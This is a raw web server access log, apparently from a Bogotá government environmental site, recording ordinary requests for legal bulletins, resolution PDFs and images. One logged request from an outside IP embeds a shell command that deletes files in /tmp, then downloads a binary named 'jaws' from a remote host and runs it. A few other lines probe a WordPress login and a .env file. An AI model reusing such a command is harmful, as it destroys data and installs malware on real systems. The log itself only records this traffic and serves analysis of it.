186.30.189.89 - - [08/Apr/2023:12:52:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3241.pdf HTTP/1.1" 200 357291
186.30.189.89 - - [08/Apr/2023:12:52:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [08/Apr/2023:12:53:54 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [08/Apr/2023:12:53:55 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:53:59 -0500] "GET /BLA/boletinlegal/.well-known/apple-app-site-association HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:53:59 -0500] "GET /BLA/boletinlegal/.well-known/assetlinks.json HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/assetlinks.json HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/apple-app-site-association HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/gpc.json HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/security.txt HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/change-password HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:00 -0500] "GET /BLA/boletinlegal/.well-known/resource-that-should-not-exist-whose-status-code-should-not-be-200/ HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:52:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [08/Apr/2023:12:54:13 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [08/Apr/2023:12:54:14 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [08/Apr/2023:12:54:15 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [08/Apr/2023:12:54:16 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
172.22.2.4 - - [08/Apr/2023:12:54:29 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:12:53:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
216.245.221.92 - - [08/Apr/2023:12:55:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:12:56:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
173.252.111.8 - - [08/Apr/2023:12:58:03 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
173.252.111.16 - - [08/Apr/2023:12:58:03 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
34.91.17.210 - - [08/Apr/2023:12:58:30 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
35.204.203.11 - - [08/Apr/2023:12:58:54 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [08/Apr/2023:12:58:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.90.147.206 - - [08/Apr/2023:13:00:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [08/Apr/2023:13:00:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:59:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
69.171.249.14 - - [08/Apr/2023:13:01:19 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
69.171.249.12 - - [08/Apr/2023:13:01:19 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
69.171.249.3 - - [08/Apr/2023:13:01:19 -0500] "GET /images/palma-de-cera-1-abril_optimized.jpeg HTTP/1.1" 200 171987
69.171.249.10 - - [08/Apr/2023:13:01:19 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
69.171.249.120 - - [08/Apr/2023:13:01:20 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
173.252.95.9 - - [08/Apr/2023:13:01:21 -0500] "GET /images/17%20de%20febrero%20mujeres%20que%20reverdecen.jpeg HTTP/1.1" 200 85735
173.252.95.120 - - [08/Apr/2023:13:01:21 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
173.252.95.18 - - [08/Apr/2023:13:01:21 -0500] "GET /images/8%20de%20febrero%20incendio%20forestal.jpeg HTTP/1.1" 200 56283
173.252.95.1 - - [08/Apr/2023:13:01:21 -0500] "GET /images/WhatsApp%20Image%202023-02-15%20at%205.07.25%20PM.jpeg HTTP/1.1" 200 50573
173.252.95.19 - - [08/Apr/2023:13:01:21 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
173.252.95.9 - - [08/Apr/2023:13:01:21 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
173.252.95.23 - - [08/Apr/2023:13:01:21 -0500] "GET /images/Conversatorio%20aire%201%20(1).jpeg HTTP/1.1" 200 72040
173.252.95.20 - - [08/Apr/2023:13:01:21 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
173.252.95.9 - - [08/Apr/2023:13:01:22 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
173.252.95.18 - - [08/Apr/2023:13:01:22 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
173.252.95.9 - - [08/Apr/2023:13:01:22 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
201.245.192.253 - - [08/Apr/2023:13:01:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
191.156.186.0 - - [08/Apr/2023:13:01:52 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 200 943
98.34.149.63 - - [08/Apr/2023:13:02:01 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
34.90.16.100 - - [08/Apr/2023:13:02:04 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [08/Apr/2023:13:02:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.70.210 - - [08/Apr/2023:13:02:26 -0500] "-" 408 -
34.91.17.210 - - [08/Apr/2023:13:02:49 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.141.239.235 - - [08/Apr/2023:13:04:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.147.116.222 - - [08/Apr/2023:13:05:11 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [08/Apr/2023:13:05:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:04:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:04:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
201.245.192.253 - - [08/Apr/2023:13:06:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
185.119.81.103 - - [08/Apr/2023:13:07:50 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [08/Apr/2023:13:07:51 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.231 - - [08/Apr/2023:13:09:49 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204143%20%20DE%202007.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:13:10:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [08/Apr/2023:13:10:48 -0500] "-" 408 -
52.167.144.76 - - [08/Apr/2023:13:11:34 -0500] "GET /bla/resoluciones/autos%202015/1153.pdf HTTP/1.1" 200 647617
172.22.2.4 - - [08/Apr/2023:13:09:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:13:11:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:13:10:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [08/Apr/2023:13:13:36 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [08/Apr/2023:13:13:40 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [08/Apr/2023:13:13:40 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [08/Apr/2023:13:13:40 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [08/Apr/2023:13:13:40 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [08/Apr/2023:13:13:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
40.77.167.231 - - [08/Apr/2023:13:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/2101.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:13:15:30 -0500] "HEAD / HTTP/1.1" 200 -
74.125.210.199 - - [08/Apr/2023:13:16:00 -0500] "GET /galeria/mapa/3MapaBogot%C3%A1.jpg HTTP/1.1" 200 688183
201.245.192.253 - - [08/Apr/2023:13:16:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:13:15:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:17:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:13:17:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
191.95.92.113 - - [08/Apr/2023:13:17:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
66.249.70.175 - - [08/Apr/2023:13:18:02 -0500] "-" 408 -
191.95.92.113 - - [08/Apr/2023:13:17:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 889384
172.22.2.4 - - [08/Apr/2023:13:16:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
172.22.2.4 - - [08/Apr/2023:13:18:30 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [08/Apr/2023:13:17:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
157.55.39.215 - - [08/Apr/2023:13:19:25 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [08/Apr/2023:13:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43150
201.245.192.253 - - [08/Apr/2023:13:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42982
94.102.61.10 - - [08/Apr/2023:13:20:16 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [08/Apr/2023:13:20:30 -0500] "HEAD / HTTP/1.1" 200 -
185.180.143.143 - - [08/Apr/2023:13:21:34 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [08/Apr/2023:13:21:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.76 - - [08/Apr/2023:13:22:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/6740.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:13:21:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:22:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
52.167.144.76 - - [08/Apr/2023:13:24:15 -0500] "GET /BLA/resoluciones/AUTOS%202022/6756.pdf HTTP/1.1" 200 509845
40.77.167.141 - - [08/Apr/2023:13:25:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3174.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:13:25:30 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.141 - - [08/Apr/2023:13:26:12 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [08/Apr/2023:13:26:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.207 - - [08/Apr/2023:13:27:21 -0500] "-" 408 -
191.95.92.113 - - [08/Apr/2023:13:27:58 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
191.95.92.113 - - [08/Apr/2023:13:28:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 581234
172.22.2.4 - - [08/Apr/2023:13:27:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:28:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [08/Apr/2023:13:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43150
201.245.192.253 - - [08/Apr/2023:13:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42982
216.245.221.92 - - [08/Apr/2023:13:30:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:13:31:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.231 - - [08/Apr/2023:13:31:50 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204179%20DE%202007.pdf HTTP/1.1" 304 -
192.144.113.34 - - [08/Apr/2023:13:32:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 465052
172.22.2.4 - - [08/Apr/2023:13:33:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.98.19.59 - - [08/Apr/2023:13:34:58 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.98.19.59 - - [08/Apr/2023:13:34:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.98.19.59 - - [08/Apr/2023:13:34:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [08/Apr/2023:13:35:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:34:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.70.172 - - [08/Apr/2023:13:36:26 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:13:36:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
181.53.13.61 - - [08/Apr/2023:13:36:43 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.53.13.61 - - [08/Apr/2023:13:36:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:43 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:45 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:49 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2228
181.53.13.61 - - [08/Apr/2023:13:36:49 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16254
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
